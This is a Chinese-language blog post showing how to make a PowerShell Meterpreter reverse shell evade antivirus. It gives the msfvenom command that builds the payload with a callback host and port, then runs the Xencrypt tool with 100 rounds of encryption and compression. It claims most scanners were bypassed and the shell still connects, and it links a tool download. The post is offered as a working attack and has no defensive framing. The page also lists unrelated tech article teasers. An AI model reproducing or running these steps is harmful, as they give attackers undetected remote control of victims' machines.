powershell加密、壓縮 免殺實戰

原創 城市烈人 2020-06-16 08:07

結合"PowerShell crypter"工具(下面用簡稱"crypter")來對powershell腳本進行加密並採用Gzip/DEFLATE來繞過殺軟

1、msfvenom生成powershell 反彈馬

msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST= 192.168.81.253 LPORT=5555 -f psh-reflection > hackshark.ps1

通過檢測,發現依然有很多家殺軟報毒


2、採用"crypter"加密、壓縮處理ps反彈木馬

在powershell終端中輸入

Import-Module ./xencrypt.ps1

Invoke-Xencrypt -InFile .\hackshark.ps1 -OutFile hackhack.ps1 -Iterations 100

"-Iterations 100"是對腳本進行100次的加密與壓縮

經過100加密、壓縮後


已經實現大部分免殺了

也能成功反彈:

工具下載地址:
https://github.com/hackshark/Hack-Tools/blob/master/powershell%E5%85%8D%E6%9D%80%E5%B7%A5%E5%85%B7xencrypt-master.zip

發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章

解密Prompt系列31. LLM Agent之從經驗中不斷學習的智能體

Agent智能體的工作流可以簡單分成兩種:一種是固定的靜態工作流,一種是智能體自主決策的動態工作流。 靜態流程的Agent舉幾個例子,例如新聞熱點追蹤推送Agent,每日新論文摘要總結Agent,它們的優點是可控,穩定,可復現,缺點是一種流

風雨中的小七 2024-06-11 14:22:16

第十二節:MySQL8.x版本新特性和變化

一.                二.                三.                  ! 作       者 : Yaopengfei(姚鵬飛) 博客地址 : http://www.cnblogs.com

Yaopengfei 2024-06-11 14:21:36

杭州的 IT 崩盤了麼?

大家好,我是R哥。 今天分享一個爽飛了的面試輔導 case: 這個杭州兄弟空窗期 1 個月+,面試了 6 家公司 0 Offer,不知道問題出在哪,難道是杭州的 IT 崩盤了麼? 報名面試輔導後,經過一個多月的輔導打磨,現在成功入職某上市

Java技術棧 2024-06-11 14:21:26

Azure Virtual Network (22) 多訂閱使用Azure DNS解析問題 Windows Azure Platform 系列文章目錄

  《Windows Azure Platform 系列文章目錄》     部署環境:   1.我們只有1個訂閱,1個Virtual Network   2.我們有1個Hub-VNet, 在Virtual Network上設置了DNS Se

Lei Zhang的博客 2024-06-11 14:20:36

VS2022 解決方案打不開 .NET Framework 4.0 、 4.5 等老項目

vs2022開發工具最低支持net4.8,以下的如net3.5、4.0、4.5項目,加載不上怎麼處理。 一、下載.NET Framework框架 .NET Framework 4.5.2 .NET Framework 4.5.1 .NET

鄭州-在路上 2024-06-11 14:20:26

Python 潮流週刊#55:分享 9 個高質量的技術類信息源!

大家好,我是貓哥,今天給大家分享幾個高質量的技術類信息源。 本文分享的信息源都是週刊類型的,所謂週刊類,就是以固定每週的頻率更新,每期分享很多精華內容的鏈接。它的特點是信息密度極高,可以節省你去查找信息的時間,高效的學習者都會喜歡這類內容。

豌豆花下貓 2024-06-11 14:19:16

統計vertica表的行數

select  anchor_table_schema || '.' || anchor_table_name as table_name,  row_countfrom PROJECTION_STORAGEorder by row_co

卡卡西村長 2024-06-11 14:19:16

開源高性能結構化日誌模塊NanoLog

  最近在寫數據庫程序,需要一個高性能的結構化日誌記錄組件,簡單研究了一下Microsoft.Extensions.Logging和Serilog,還是決定重造一個輪子。 一、使用方法   直接參考以下示例代碼: NanoLogger.St

白菜園 2024-06-11 14:18:16

Vue3 運行可以,build 打包發佈報錯,app.config.globalProperties 用法坑

目錄錯誤原因解決方案 app.config.globalProperties 用法坑Vue, 多環境配置 https://www.cnblogs.com/vipsoft/p/16696640.html main.js import conf

阿 軍 2024-06-11 14:15:15

Vue 打包 Error: error:0308010C:digital envelope routines::unsupported

這個錯誤通常與Node.js的加密模塊和OpenSSL版本有關 出現這個錯誤是因爲 node.js V17版本中最近發佈的OpenSSL3.0, 而OpenSSL3.0對允許算法和密鑰大小增加了嚴格的限制,可能會對生態系統造成一些影響. j

阿 軍 2024-06-11 14:15:05

Windows 允許空密碼遠程桌面

Windows 允許空密碼遠程桌面 開啓遠程 修改策略 輸入命令 secpol.msc 本地策略 -> 安全選項 -> 帳戶:使用空密碼的本地帳戶只允許進行控制檯登錄

阿 軍 2024-06-11 14:15:05

dubbo~全局異常攔截器的使用與設計缺陷~續

上一次的介紹,主要圍繞如何統一去捕獲異常,以及爲每一種異常添加自己的Mapper實現,並且我們知道,當在ExceptionMapper中返回非200的Response,不支持application/json的響應類型,而是寫死的text/p

張佔嶺 2024-06-11 14:12:35

如何安全地訪問互聯網

當你深夜在瀏覽器中輸入 www.baidu.com 時有沒有想過,除了月黑風高的夜和本機的瀏覽記錄,還有誰知道你訪問了它呢?要搞清楚這件事,首先我們要了解一下訪問網站時,這其中發生了什麼。 如果你在 10 年之前訪問網站,大概率會在瀏覽器的

張高興 2024-06-11 14:08:15

前端使用 Konva 實現可視化設計器(14)- 折線 - 最優路徑應用【代碼篇】

話接上回《前端使用 Konva 實現可視化設計器(13)- 折線 - 最優路徑應用【思路篇】》,這一章繼續說說相關的代碼如何構思的,如何一步步構建數據模型可供 AStar 算法進行路徑規劃,最終畫出節點之間的連接折線。 請大家動動小手,給

xachary 2024-06-11 14:08:05

[快速閱讀七] Halcon裏emphasize函數相關資料.

  時不時有人問我我的SSE優化Demo裏emphasize(邊緣強調)的原理是啥,有沒有寫博客,其實不是我不願意寫博客,而是那個東西太過於簡單,我不想寫博客。但是耐不住問的人多了,我就乾脆複製點資料放在博客裏吧,省的每次我還要去找點資料複

Imageshop 2024-06-11 14:08:05